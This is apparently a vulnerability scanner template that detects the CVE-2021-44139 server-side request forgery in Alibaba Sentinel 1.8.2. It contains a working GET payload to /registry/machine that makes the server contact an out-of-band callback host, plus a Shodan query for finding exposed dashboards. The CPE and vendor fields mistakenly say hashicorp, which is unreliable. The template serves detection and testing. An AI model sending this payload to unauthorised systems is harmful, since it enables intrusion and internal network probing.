id: CVE-2021-44139 info: name: Alibaba Sentinel - Server-side request forgery (SSRF) author: DhiyaneshDK severity: high description: | There is a Pre-Auth SSRF vulnerability in Alibaba Sentinel version 1.8.2, which allows remote unauthenticated attackers to perform SSRF attacks via the /registry/machine endpoint through the ip parameter. remediation: | Apply the latest security patches or updates provided by Alibaba Sentinel to fix the SSRF vulnerability (CVE-2021-44139). reference: - https://github.com/alibaba/Sentinel/issues/2451 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2021-44139 cwe-id: CWE-918 epss-score: 0.01329 epss-percentile: 0.84565 cpe: cpe:2.3:a:hashicorp:sentinel:1.8.2:*:*:*:*:*:*:* metadata: max-request: 1 vendor: hashicorp product: sentinel shodan-query: title:"Sentinel Dashboard" tags: cve,cve2021,ssrf,alibaba,oast,misconfig,sentinel http: - method: GET path: - "{{BaseURL}}/registry/machine?app={{rand_base(5)}}&appType=0&version=0&hostname={{rand_base(5)}}&ip={{interactsh-url}}&port=0" matchers-condition: and matchers: - type: word part: interactsh_protocol # Confirms the DNS Interaction words: - "dns" - type: word part: header words: - application/json - type: word part: body words: - '"success":true' - '"msg":"success"' condition: and # digest: 490a0046304402202e3ae396ddd143a0ea716700e16512b3ab4203ef2828a51d9e3a7b96259172d9022025f7bd255679f01d82f0d62ea1e565c560abce857b2e0b83cd42182c87efd87f:922c64590222798bb761d5b6d8e72950